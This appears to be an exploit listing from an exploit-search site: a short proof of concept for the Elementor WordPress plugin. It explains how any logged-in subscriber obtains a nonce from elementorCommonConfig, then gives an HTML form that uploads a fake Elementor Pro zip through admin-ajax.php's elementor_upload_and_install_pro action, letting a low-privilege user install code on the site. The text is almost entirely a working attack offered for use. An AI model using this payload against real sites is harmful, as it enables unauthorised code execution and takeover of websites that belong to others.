Share 
## https://sploitus.com/exploit?id=WPEX-ID:DF62D170-C7D1-43A4-B6DC-20512934C33E
To get the nonce, login as any user (such as subscriber) and check the source for elementorCommonConfig. The file to upload should be a fake Elementor Pro plugin zip

<body>
<form action="https://example.com/wp-admin/admin-ajax.php" enctype="multipart/form-data" method="POST">
<input type="text" name="_nonce" value="nonce retrieved from source (check elementorCommonConfig) of the dashboard when logged in as any user">
<input type="file" name="fileToUpload">
<input type="hidden" name="action" value="elementor_upload_and_install_pro">
<input type="submit" value="Submit">
</form>
</body>